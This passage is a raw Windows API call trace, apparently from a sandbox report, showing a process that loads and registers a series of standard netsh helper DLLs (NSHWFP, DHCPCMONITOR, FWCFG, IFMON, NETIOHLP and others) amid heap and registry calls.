LocalFree (hMem=0x2f4330) returned 0x0 [0125.118] GetVersion () returned 0x1db10106 [0125.119] GlobalLock (hMem=0x7f0008) returned 0x2f4330 [0125.119] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2f4550 [0125.120] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2f3050 [0125.120] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2f2330 [0125.120] malloc (_Size=0x100) returned 0x1d7bd0 [0125.120] __dllonexit () returned 0x7fef2de621c [0125.120] __dllonexit () returned 0x7fef2de66e0 [0125.120] __dllonexit () returned 0x7fef2de72b8 [0125.121] __dllonexit () returned 0x7fef2de87cc [0125.121] __dllonexit () returned 0x7fef2de8d64 [0125.121] __dllonexit () returned 0x7fef2de8db4 [0125.121] __dllonexit () returned 0x7fef2de8e70 [0125.121] __dllonexit () returned 0x7fef2dea308 [0125.121] __dllonexit () returned 0x7fef2de8810 [0125.122] __dllonexit () returned 0x7fef2df7598 [0125.122] __dllonexit () returned 0x7fef2de8880 [0125.122] __dllonexit () returned 0x7fef2dea170 [0125.122] __dllonexit () returned 0x7fef2dea280 [0125.122] __dllonexit () returned 0x7fef2dead44 [0125.122] __dllonexit () returned 0x7fef2debc30 [0125.123] __dllonexit () returned 0x7fef2debc80 [0125.123] __dllonexit () returned 0x7fef2dec338 [0125.123] __dllonexit () returned 0x7fef2ded030 [0125.123] __dllonexit () returned 0x7fef2de59cc [0125.123] __dllonexit () returned 0x7fef2de59f0 [0125.123] __dllonexit () returned 0x7fef2de5a1c [0125.133] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0125.135] __dllonexit () returned 0x7fef2df7568 [0125.135] __dllonexit () returned 0x7fef2df7574 [0125.135] __dllonexit () returned 0x7fef2df7580 [0125.136] __dllonexit () returned 0x7fef2df758c [0125.136] GetVersion () returned 0x1db10106 [0125.136] GetVersion () returned 0x1db10106 [0125.136] GetVersion () returned 0x1db10106 [0125.136] __dllonexit () returned 0x7fef2d4a15c [0125.136] __dllonexit () returned 0x7fef2d56610 [0125.136] __dllonexit () returned 0x7fef2de8910 [0125.136] __dllonexit () returned 0x7fef2de8b90 [0125.137] __dllonexit () returned 0x7fef2de8bb4 [0125.137] __dllonexit () returned 0x7fef2d66ae0 [0125.137] GetVersion () returned 0x1db10106 [0125.137] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0125.137] GetSystemMetrics (nIndex=11) returned 32 [0125.138] GetSystemMetrics (nIndex=12) returned 32 [0125.138] GetSystemMetrics (nIndex=2) returned 17 [0125.138] GetSystemMetrics (nIndex=3) returned 17 [0125.138] GetDC (hWnd=0x0) returned 0xa0109cb [0125.138] GetDeviceCaps (hdc=0xa0109cb, index=88) returned 96 [0125.138] GetDeviceCaps (hdc=0xa0109cb, index=90) returned 96 [0125.138] ReleaseDC (hWnd=0x0, hDC=0xa0109cb) returned 1 [0125.138] GetSysColor (nIndex=15) returned 0xf0f0f0 [0125.138] GetSysColor (nIndex=16) returned 0xa0a0a0 [0125.138] GetSysColor (nIndex=20) returned 0xffffff [0125.138] GetSysColor (nIndex=18) returned 0x0 [0125.138] GetSysColor (nIndex=6) returned 0x646464 [0125.138] GetSysColorBrush (nIndex=15) returned 0x1100059 [0125.138] GetSysColorBrush (nIndex=6) returned 0x1100061 [0125.138] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0125.138] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0125.138] __dllonexit () returned 0x7fef2de8f84 [0125.139] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0125.140] __dllonexit () returned 0x7fef2d73990 [0125.140] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0125.141] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0125.141] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0125.141] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0125.141] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0125.141] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0125.141] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0125.141] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0125.141] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0125.141] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0125.141] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0125.141] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0125.141] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0125.141] __dllonexit () returned 0x7fef2df75a4 [0125.141] __dllonexit () returned 0x7fef2df75bc [0125.142] __dllonexit () returned 0x7fef2df75c8 [0125.142] __dllonexit () returned 0x7fef2df75d4 [0125.142] __dllonexit () returned 0x7fef2df75e0 [0125.142] GetCursorPos (in: lpPoint=0x7fef2e526d8 | out: lpPoint=0x7fef2e526d8*(x=380, y=629)) returned 1 [0125.143] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2f48a0 [0125.143] LocalReAlloc (hMem=0x2f2330, uBytes=0x18, uFlags=0x2) returned 0x2f49b0 [0125.143] GetCurrentThread () returned 0xfffffffffffffffe [0125.143] GetCurrentThreadId () returned 0xa5c [0125.143] __dllonexit () returned 0x7fef2decfa4 [0125.143] SetErrorMode (uMode=0x0) returned 0x8001 [0125.143] SetErrorMode (uMode=0x8001) returned 0x0 [0125.143] GetModuleFileNameW (in: hModule=0x7fef2d30000, lpFilename=0x126910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0125.144] wcscpy_s (in: _Destination=0x126b20, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0125.162] FindResourceW (hModule=0x7fef2d30000, lpName=0xe01, lpType=0x6) returned 0x2509b0 [0125.187] LoadStringW (in: hInstance=0x7fef2d30000, uID=0xe000, lpBuffer=0x126d30, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0125.187] wcscpy_s (in: _Destination=0x126944, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0125.187] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0125.188] malloc (_Size=0x80) returned 0x1d7e00 [0125.188] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2f49d0 [0125.188] GetSystemDirectoryA (in: lpBuffer=0x126fb0, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.188] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0125.188] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0125.188] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0125.188] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0125.190] GetProcAddress (hModule=0x7fef2e80000, lpProcName="InitHelperDll") returned 0x7fef2e9cf70 [0125.190] InitHelperDll () returned 0x0 [0125.191] RegisterHelper () returned 0x0 [0125.191] GetProcessHeap () returned 0x2d0000 [0125.191] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x108) returned 0x2f6ae0 [0125.191] GetProcessHeap () returned 0x2d0000 [0125.191] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f28e0 | out: hHeap=0x2d0000) returned 1 [0125.191] RegisterHelper () returned 0x0 [0125.191] GetProcessHeap () returned 0x2d0000 [0125.191] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x160) returned 0x2f6bf0 [0125.191] GetProcessHeap () returned 0x2d0000 [0125.191] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6ae0 | out: hHeap=0x2d0000) returned 1 [0125.192] RegisterHelper () returned 0x0 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1b8) returned 0x2f6d60 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6bf0 | out: hHeap=0x2d0000) returned 1 [0125.192] RegisterHelper () returned 0x0 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x210) returned 0x2f6ae0 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6d60 | out: hHeap=0x2d0000) returned 1 [0125.192] RegisterHelper () returned 0x0 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x268) returned 0x2f6d00 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.192] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6ae0 | out: hHeap=0x2d0000) returned 1 [0125.192] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="nshwfp", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0125.192] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0125.192] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0125.192] GetProcessHeap () returned 0x2d0000 [0125.193] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f28e0 [0125.193] GetProcessHeap () returned 0x2d0000 [0125.193] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x2f2330 [0125.193] GetProcessHeap () returned 0x2d0000 [0125.193] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x2f2350 [0125.193] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0125.193] GetProcessHeap () returned 0x2d0000 [0125.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2880 | out: hHeap=0x2d0000) returned 1 [0125.193] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef2f60000 [0128.224] GetProcAddress (hModule=0x7fef2f60000, lpProcName="InitHelperDll") returned 0x7fef2fcb6d0 [0128.224] InitHelperDll () returned 0x0 [0128.236] RegisterHelper () returned 0x0 [0128.236] GetProcessHeap () returned 0x2d0000 [0128.236] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2c0) returned 0x300ea0 [0128.236] GetProcessHeap () returned 0x2d0000 [0128.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6d00 | out: hHeap=0x2d0000) returned 1 [0128.236] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="dhcpclient", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0128.237] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0128.237] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0128.237] GetProcessHeap () returned 0x2d0000 [0128.237] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa0) returned 0x2f6d00 [0128.237] GetProcessHeap () returned 0x2d0000 [0128.237] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x2f2370 [0128.237] GetProcessHeap () returned 0x2d0000 [0128.237] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x22) returned 0x2f7330 [0128.237] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0128.237] GetProcessHeap () returned 0x2d0000 [0128.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f28e0 | out: hHeap=0x2d0000) returned 1 [0128.237] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef3400000 [0131.586] GetProcAddress (hModule=0x7fef3400000, lpProcName="InitHelperDll") returned 0x7fef3401a40 [0131.586] InitHelperDll () returned 0x0 [0131.586] RegisterHelper () returned 0x0 [0131.586] GetProcessHeap () returned 0x2d0000 [0131.586] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x318) returned 0x305e30 [0131.587] GetProcessHeap () returned 0x2d0000 [0131.587] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x300ea0 | out: hHeap=0x2d0000) returned 1 [0131.587] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="wshelper", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0131.587] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0131.587] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0131.587] GetProcessHeap () returned 0x2d0000 [0131.587] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc8) returned 0x300ea0 [0131.587] GetProcessHeap () returned 0x2d0000 [0131.587] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x3035e0 [0131.587] GetProcessHeap () returned 0x2d0000 [0131.587] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x3015f0 [0131.587] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0131.587] GetProcessHeap () returned 0x2d0000 [0131.587] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f6d00 | out: hHeap=0x2d0000) returned 1 [0131.587] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef33f0000 [0134.026] GetProcAddress (hModule=0x7fef33f0000, lpProcName="InitHelperDll") returned 0x7fef33f1720 [0134.026] InitHelperDll () returned 0x0 [0134.035] RegisterHelper () returned 0x0 [0134.035] GetProcessHeap () returned 0x2d0000 [0134.035] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x370) returned 0x306ba0 [0134.035] GetProcessHeap () returned 0x2d0000 [0134.035] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x305e30 | out: hHeap=0x2d0000) returned 1 [0134.035] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="nshhttp", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0134.035] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0134.035] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0134.035] GetProcessHeap () returned 0x2d0000 [0134.035] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf0) returned 0x305e30 [0134.035] GetProcessHeap () returned 0x2d0000 [0134.036] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x303600 [0134.036] GetProcessHeap () returned 0x2d0000 [0134.036] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x303620 [0134.036] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0134.036] GetProcessHeap () returned 0x2d0000 [0134.036] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x300ea0 | out: hHeap=0x2d0000) returned 1 [0134.036] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef33a0000 [0134.360] GetProcAddress (hModule=0x7fef33a0000, lpProcName="InitHelperDll") returned 0x7fef33a1c24 [0134.360] InitHelperDll () returned 0x0 [0134.360] RegisterHelper () returned 0x0 [0134.360] GetProcessHeap () returned 0x2d0000 [0134.360] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3c8) returned 0x306f20 [0134.360] GetProcessHeap () returned 0x2d0000 [0134.360] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x306ba0 | out: hHeap=0x2d0000) returned 1 [0134.360] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="fwcfg", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0134.360] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0134.360] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0134.360] GetProcessHeap () returned 0x2d0000 [0134.361] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x118) returned 0x305f30 [0134.361] GetProcessHeap () returned 0x2d0000 [0134.361] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x303640 [0134.361] GetProcessHeap () returned 0x2d0000 [0134.361] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x303660 [0134.361] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0134.361] GetProcessHeap () returned 0x2d0000 [0134.361] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x305e30 | out: hHeap=0x2d0000) returned 1 [0134.361] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef3260000 [0136.583] GetProcAddress (hModule=0x7fef3260000, lpProcName="InitHelperDll") returned 0x7fef3262d20 [0136.583] InitHelperDll () returned 0x0 [0136.583] RegisterHelper () returned 0x0 [0136.583] GetProcessHeap () returned 0x2d0000 [0136.583] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x420) returned 0x30b2f0 [0136.583] GetProcessHeap () returned 0x2d0000 [0136.583] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x306f20 | out: hHeap=0x2d0000) returned 1 [0136.583] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="authfwcfg", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0136.583] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0136.583] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0136.584] GetProcessHeap () returned 0x2d0000 [0136.584] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x140) returned 0x306ba0 [0136.584] GetProcessHeap () returned 0x2d0000 [0136.584] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x3036a0 [0136.584] GetProcessHeap () returned 0x2d0000 [0136.584] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c) returned 0x306720 [0136.584] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0136.584] GetProcessHeap () returned 0x2d0000 [0136.584] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x305f30 | out: hHeap=0x2d0000) returned 1 [0136.584] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef2cb0000 [0139.835] GetProcAddress (hModule=0x7fef2cb0000, lpProcName="InitHelperDll") returned 0x7fef2cb5d20 [0139.835] InitHelperDll () returned 0x0 [0142.082] RegisterHelper () returned 0x0 [0142.082] GetProcessHeap () returned 0x2d0000 [0142.082] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x478) returned 0x30e740 [0142.082] GetProcessHeap () returned 0x2d0000 [0142.082] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30b2f0 | out: hHeap=0x2d0000) returned 1 [0142.082] RegisterHelper () returned 0x0 [0142.082] GetProcessHeap () returned 0x2d0000 [0142.082] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4d0) returned 0x30ebc0 [0142.082] GetProcessHeap () returned 0x2d0000 [0142.082] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30e740 | out: hHeap=0x2d0000) returned 1 [0142.083] RegisterHelper () returned 0x0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x528) returned 0x30f0a0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30ebc0 | out: hHeap=0x2d0000) returned 1 [0142.083] RegisterHelper () returned 0x0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x580) returned 0x30e740 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30f0a0 | out: hHeap=0x2d0000) returned 1 [0142.083] RegisterHelper () returned 0x0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x5d8) returned 0x30ecd0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30e740 | out: hHeap=0x2d0000) returned 1 [0142.083] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="2", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0142.083] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0142.083] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x168) returned 0x307140 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x3072b0 [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x30e170 [0142.083] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0142.083] GetProcessHeap () returned 0x2d0000 [0142.083] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x306ba0 | out: hHeap=0x2d0000) returned 1 [0142.083] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef3230000 [0142.394] GetProcAddress (hModule=0x7fef3230000, lpProcName="InitHelperDll") returned 0x7fef3231924 [0142.394] InitHelperDll () returned 0x0 [0142.394] RegisterHelper () returned 0x0 [0142.394] GetProcessHeap () returned 0x2d0000 [0142.394] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x630) returned 0x310ab0 [0142.394] GetProcessHeap () returned 0x2d0000 [0142.394] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30ecd0 | out: hHeap=0x2d0000) returned 1 [0142.394] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="netiohlp", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0142.395] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0142.395] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0142.395] GetProcessHeap () returned 0x2d0000 [0142.395] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x190) returned 0x30b3c0 [0142.395] GetProcessHeap () returned 0x2d0000 [0142.395] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e290 [0142.395] GetProcessHeap () returned 0x2d0000 [0142.395] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x30f970 [0142.395] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0142.395] GetProcessHeap () returned 0x2d0000 [0142.395] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307140 | out: hHeap=0x2d0000) returned 1 [0142.395] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef2f20000 [0145.109] GetProcAddress (hModule=0x7fef2f20000, lpProcName="InitHelperDll") returned 0x7fef2f3ce30 [0145.109] InitHelperDll () returned 0x0 [0145.109] RegisterHelper () returned 0x0 [0145.109] GetProcessHeap () returned 0x2d0000 [0145.109] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x688) returned 0x3110f0 [0145.109] GetProcessHeap () returned 0x2d0000 [0145.109] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310ab0 | out: hHeap=0x2d0000) returned 1 [0145.109] RegisterHelper () returned 0x0 [0145.109] GetProcessHeap () returned 0x2d0000 [0145.109] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x6e0) returned 0x311780 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3110f0 | out: hHeap=0x2d0000) returned 1 [0145.110] RegisterHelper () returned 0x0 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x738) returned 0x310ab0 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x311780 | out: hHeap=0x2d0000) returned 1 [0145.110] RegisterHelper () returned 0x0 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x790) returned 0x3111f0 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310ab0 | out: hHeap=0x2d0000) returned 1 [0145.110] RegisterHelper () returned 0x0 [0145.110] GetProcessHeap () returned 0x2d0000 [0145.110] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7e8) returned 0x311990 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3111f0 | out: hHeap=0x2d0000) returned 1 [0145.111] RegisterHelper () returned 0x0 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x840) returned 0x312180 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x311990 | out: hHeap=0x2d0000) returned 1 [0145.111] RegisterHelper () returned 0x0 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x898) returned 0x310ab0 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312180 | out: hHeap=0x2d0000) returned 1 [0145.111] RegisterHelper () returned 0x0 [0145.111] GetProcessHeap () returned 0x2d0000 [0145.111] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8f0) returned 0x311350 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310ab0 | out: hHeap=0x2d0000) returned 1 [0145.112] RegisterHelper () returned 0x0 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x948) returned 0x311c50 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x311350 | out: hHeap=0x2d0000) 